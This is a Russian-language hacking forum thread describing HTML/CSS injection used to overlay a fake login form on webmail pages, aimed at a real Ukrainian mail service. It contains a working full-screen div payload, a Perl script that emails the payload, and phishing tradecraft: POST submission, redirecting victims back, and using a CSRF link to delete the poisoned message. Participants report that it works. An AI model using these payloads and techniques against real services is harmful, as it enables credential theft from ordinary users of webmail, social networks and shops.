HTML Injection

[tipsy]

Грядки, на которых раньше буйно цвёл XSS, давно вытоптаны стадами жадных школьников, потому старый и никому ранее не нужный баян под названием "HTML Injection" может заиграть новыми нотами :)

Цитата:

CSS level 2 was developed by the W3C and published as a Recommendation in May 1998. A superset of CSS1, CSS2 includes a number of new capabilities like absolute, relative, and fixed positioning of elements and z-index
http://en.wikipedia.org/wiki/Css

Очень старая тема, я же вам говорил.

• Уязвимы: Все сервисы, которые разрешают HTML + CSS и фильтруют его по блэклисту, потенциально уязвимы
• Не уязвимы: Сервисы, фильтрующие по вайтлисту (gmail)

Список потенциальных жертв: вебмейлы, социальные сети, бложеки, шопы.

Суть такова:
В документ внедряется HTML-элемент(обычно div или span), который средствами css2 делается полноэкранным либо выводится в шапку/сайдбар, частично или полностью замещая реальный интерфейс. Внутри внедрённого элемента находится фальшивая форма для ввода логина/пароля (обычный HTML).
Изменение страницы, в отличие от фейка, сделанного через XSS, происходит на этапе рендера, до того, как что-то отобразилось, потому заметить подмену невозможно даже намётанным глазом фишера.

Способов внедрить css property примерно в миллион раз больше, чем способов внедрить javascript, потому фильтрация "плохого css" по блэклисту неэффективна.

Пара полезных приёмов:
-не пугайте юзера его паролем в адрессбаре, делайте POST запрос. На своём скрипте пните его назад обычным 302 редиректом на страничку, которую он ожидает увидеть. POST волшебным образом превратится в GET (хотя rfc пишут по-другому)
-в одной из реализаций атаки на веб-мэйл в качестве ссылки возврата использовалась CSRF ссылка на удаление "ядовитого" письма, которая, в свою очередь, возвращала в инбокс. ID письма брался из реферера. Элегантно и эффективно. Саша, привет! :)

В качестве примера мы убъём тему с HTML Injection на популярном украинском почтовике ukr.net
Тестовый ящик:
rdot.org@ukr.net:05a671c66aefea124cc08b76ea6d30bb (дабы отсеять совсем левую публику - хеш)
Ukr.net грузит письмо аяксом, так что есть пауза. Для ресурсов, выдающих контент одним куском, её не будет.

Я поленился рисовать форму логина, но идея понятна.
Никакого яваскрипта, чистый HTML4+CSS2.

Простейший код для тестирования:

Код HTML:

outer text
<div style="position:fixed;top:0px;left:0px;width:100%;height:100%;z-index:999;background-color:black;">
inner text
<form action="http://www.google.com/search">
Login: <input value="test" name="q">
<input type="submit" value="send">
</form>
</div>

// специально для rdot.org
// копирование без ссылки на источник не одобряется.

[DrakonHaSh]

круто

но письмо содержит в себе лишь:

Код:

<div class="ukr_editor_quotation_wrap">
  <div class="nicedit-wrap">
    <div class="ukr_editor_quotation_wrap"></div>outer text
    <div style="position: fixed; top: 0px; left: 0px; width: 100%; height: 100%; z-index: 999; background-color: black;">
      inner text <input value="test"> <input value="clickme" type="submit">
    </div><br>
    <br>
  </div>
</div>

формы я там не обнаружил. (и по клику на clickme в письме ничего не происходит)
так и было задумано ?

[tipsy]

Видимо, я проебал форму при конструировании письма (пихал через встроенный редактор)
У меня в другом ящике лежит первый вариант, с рабочей формой - письмо слал внешней программой.

[hard]

Сто лет уже используется в профильных дорах.

[tipsy]

Цитата:

Сообщение от hard

Сто лет уже используется в профильных дорах.

Хмм, не могу понять, каким боком доры к фишингу.
---
Ааа, ты про доры, которые пихают прицепом в чужие ресы? Ага.

[Demon1X]

Цитата:

Сообщение от tipsy

• Уязвимы: Все сервисы, которые разрешают HTML + CSS и фильтруют его по блэклисту, потенциально уязвимы
• Не уязвимы: Сервисы, фильтрующие по вайтлисту (gmail)

1. Поисните пожалуйста, что за фильтры по блэклисту и вайтлисту? как работают? как определить какой на нужном ресурсе?

Цитата:

Ааа, ты про доры, которые пихают прицепом в чужие ресы? Ага.

2. А вот это вообще мозг вынесло, можно разъяснить?

[life_glider]

[QUOTE=Demon1X;6442]1. Поисните пожалуйста, что за фильтры по блэклисту и вайтлисту? как работают? как определить какой на нужном ресурсе?/QUOTE]

блэклист - разрешено что не запрещено
вайтлист - запрещено что не разрешено
попихай разные(левые) тэги с разными и левыми параметрами.

[tipsy]

Цитата:

Сообщение от Cross

Да, формы нет...

Закиньте кто-то с формой

Цитата:

#!/usr/bin/perl -w
use strict;
use MIME::Lite;

# SendTo email id
my $email = 'rdot.org@ukr.net';

# create a new MIME Lite based email
my $msg = MIME::Lite->new
(
Subject => "test2",
From => 'user@localhost',
To => $email,
Type => 'text/html',
Data => '<div style="position:fixed;top:0px;left:0px;width:100%; height:100%;z-index:999;background-color:white;">
<form action="http://www.google.com/search">
Login: <input value="test" name="q">
<input type="submit" value="send">
</form>
</div>'
);

$msg->send();

Только учтите, что дойдёт минимум часа через 3
http://ru.wikipedia.org/wiki/Серый_список

[DrakonHaSh]

письмо закинул, все работает

[tipsy]

Цитата:

Сообщение от DrakonHaSh

письмо закинул, все работает :)

Спасибо :)

Кстати, есть много других интересных тэгов, которые можно использовать в случае, если HTML фильтруют по блеклисту. Некоторые атаки основаны на чистом HTML, без css. Оставлю эти моменты на откуп читателю :)